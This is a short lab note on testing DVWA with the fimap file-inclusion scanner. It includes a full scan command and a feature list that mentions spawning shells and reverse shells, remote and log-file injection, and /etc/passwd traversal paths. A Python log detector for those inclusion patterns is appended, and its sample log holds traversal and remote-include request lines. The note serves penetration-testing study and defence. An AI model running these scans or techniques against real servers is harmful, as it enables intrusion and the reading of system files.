fimap
A tool for testing LFI and RFI.
Using it to test DVWA for the file-inclusion vulnerability:
fimap -u 'http://192.168.234.132:8888/dvwa/vulnerabilities/fi/?page=include.php' --cookie="security=low; PHPSESSID=h70e76i4754ni0hm4m7gvjbm60" --verbose=3
No vulnerability was detected; the cause is unknown and still to be worked out.
Adding the --enable-blind option makes it find /etc/passwd.
How it works (feature overview):
- Check a single URL, a list of URLs, or Google results fully automatically.
- Can identify and exploit file inclusion bugs.
- Relative/absolute path handling.
- Tries automatically to eliminate suffixes with a null byte and other methods such as dot truncation.
- Remote file injection.
- Logfile injection. (FimapLogInjection)
- Test and exploit multiple bugs:
  - include()
  - include_once()
  - require()
  - require_once()
- You always define absolute pathnames in the configs. No monkey-like redundant paths such as:
  - ../etc/passwd
  - ../../etc/passwd
  - ../../../etc/passwd
- Has a blind mode (--enable-blind) for cases where the server has disabled error messages. (BlindMode)
- Has an interactive exploit mode which...
  - ...can spawn a shell on vulnerable systems.
  - ...can spawn a reverse shell on vulnerable systems.
  - ...can do everything you have added to your payload dict inside config.py.
- Add your own payloads and paths to the config.py file.
- Has a harvest mode which can collect URLs from a given domain for later pentesting.
- Go to FimapHelpPage for all features.
- Also works on Windows.
- Can handle directories in RFI mode like:
  - <? include ($_GET["inc"] . "/content/index.html"); ?>
  - <? include ($_GET["inc"] . "_lang/index.html"); ?>
  - where a null byte is not possible.
- Can use proxies.
- Scans and exploits GET, POST and cookies.
- Has a very small footprint. (No senseless bruteforcing of paths, unless you need it.)
- Can also attack Windows servers! (WindowsAttack)
- Has a tiny plugin interface for writing exploit-mode plugins. (PluginDevelopment)
- Check out the PHPInfo() exploit plugin: FimapPhpInfoExploit
- Non-interactive exploiting. (FimapNonInteractiveExec)
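As an added example, not part of this note or of fimap itself: a small Python detector that flags, in web-server access logs, the inclusion techniques the feature list above names (relative/absolute path handling, null-byte and dot-truncation suffix stripping, remote file inclusion). The log lines, hosts and paths are constructed; the indicator names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache-style access-log sample (hypothetical hosts and paths), one request per line.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1523
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../etc/passwd HTTP/1.1" 200 2310
192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/fi/?page=/etc/passwd%00 HTTP/1.1" 200 2310
192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET /dvwa/vulnerabilities/fi/?page=http://203.0.113.5/x.txt HTTP/1.1" 500 0
192.0.2.10 - - [01/Jan/2024:10:00:04 +0000] "GET /dvwa/vulnerabilities/fi/?page=file1.php HTTP/1.1" 200 1400
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify_value(value):
    """Name the inclusion indicators present in one query-parameter value."""
    v = unquote(value)  # second decode also exposes double-encoded values such as %252e
    found = []
    if re.search(r'(^|[\\/])\.\.([\\/]|$)', v):
        found.append("traversal")        # ../ or ..\ segments (relative path handling)
    if v.startswith("/") or re.match(r'^[A-Za-z]:[\\/]', v):
        found.append("absolute_path")    # /etc/passwd or C:\... given directly
    if "\x00" in v:
        found.append("null_byte")        # %00 used to cut off an appended suffix
    if re.search(r'\.{4,}$', v):
        found.append("dot_truncation")   # trailing dot run, the other suffix-stripping trick
    if re.match(r'^[A-Za-z][A-Za-z0-9+.-]*://', v):
        found.append("remote_include")   # URL or stream wrapper handed to include()
    return found

def scan_log(text):
    """Return one hit per flagged parameter: line number, name, raw value, indicators."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            indicators = classify_value(value)
            if indicators:
                hits.append({"line": line_no, "param": name,
                             "value": value, "indicators": indicators})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Feed it a real access log to see which parameters a scan such as the fimap run above touched; the blind-mode run in particular leaves the same traversal and absolute-path values behind even when the server returns no error text.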